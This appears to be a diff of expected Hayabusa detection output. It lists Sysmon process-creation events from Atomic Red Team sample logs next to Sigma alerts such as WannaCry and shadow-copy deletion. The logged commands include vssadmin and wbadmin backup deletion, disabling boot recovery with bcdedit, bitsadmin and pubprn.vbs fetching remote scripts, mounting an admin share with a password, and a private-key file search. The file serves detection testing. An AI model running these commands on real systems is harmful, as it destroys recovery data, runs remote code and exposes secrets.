+2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe  delete shadows /all /quiet  :  Path: C:\Windows\System32\vssadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe  delete catalog -quiet  :  Path: C:\Windows\System32\wbadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe""  :  Path: C:\Windows\System32\wbengine.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe  :  Path: C:\Windows\System32\vds.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe  /set {default} bootstatuspolicy ignoreallfailures  :  Path: C:\Windows\System32\bcdedit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe  /set {default} recoveryenabled no  :  Path: C:\Windows\System32\bcdedit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe   /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /create AtomicBITS  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /complete AtomicBITS  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /resume AtomicBITS  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe  /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost  script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe  /c  net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net  use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator  :  Path: C:\Windows\System32\net.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd.exe  /c  net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe  /S /D /c"" dir c:\ /b /s .key ""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr  /e .key  :  Path: C:\Windows\System32\findstr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
